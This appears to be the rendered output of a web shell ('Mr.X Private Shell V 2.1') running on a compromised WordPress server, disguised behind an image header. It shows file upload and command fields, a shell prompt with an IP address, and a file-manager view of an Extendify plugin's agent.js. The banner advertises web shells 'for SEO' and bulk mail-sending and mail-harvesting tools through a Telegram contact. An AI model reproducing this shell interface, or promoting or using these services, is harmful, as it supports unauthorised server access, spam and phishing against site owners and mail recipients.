����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

fistvdlb@216.73.217.65: ~ $
import { Agent } from '@agent/Agent.jsx';
import { render } from '@shared/lib/dom';
import { isEmbedded } from '@shared/lib/embedded-guard';
import { isOnLaunch } from '@shared/lib/utils';
import domReady from '@wordpress/dom-ready';
import '@agent/agent.css';
import '@agent/buttons';
import { GuidedTour } from '@agent/components/GuidedTour';
import { throwSideConfetti } from './lib/confetti';

domReady(() => {
	// Never activate framed — the Customizer preview, page-builder previews,
	// and the block-editor canvas are all someone else's iframe.
	if (isEmbedded()) return;

	// disableForReducedMotion
	// tours
	const tourId = 'extendify-agent-tour';
	if (document.getElementById(tourId)) return;
	const tour = Object.assign(document.createElement('div'), {
		className: 'extendify-agent-tour',
		id: tourId,
	});
	render(<GuidedTour />, tour);

	const bg =
		// admin area
		document.getElementById('wpwrap') ||
		// TODO: is this on all block themes?
		document.querySelector('.wp-site-blocks');
	if (isOnLaunch() || !bg) return;
	const id = 'extendify-agent-main';
	if (document.getElementById(id)) return;
	const agent = Object.assign(document.createElement('div'), {
		className: 'extendify-agent',
		id,
	});
	document.body.appendChild(agent);
	render(<Agent />, agent);

	// Runs when extendify-launch-success is in the url
	if (window.extAgentData?.startOnboarding) {
		requestAnimationFrame(() => {
			throwSideConfetti();
		});
	}
});

Filemanager

Name Type Size Permission Actions
components Folder 0755
hooks Folder 0755
lib Folder 0755
state Folder 0755
tours Folder 0755
workflows Folder 0755
Agent.jsx File 19.6 KB 0644
Chat.jsx File 1.98 KB 0644
agent.css File 3.98 KB 0644
agent.js File 1.42 KB 0644
api.js File 4.48 KB 0644
buttons.js File 2.29 KB 0644
icons.jsx File 6.92 KB 0644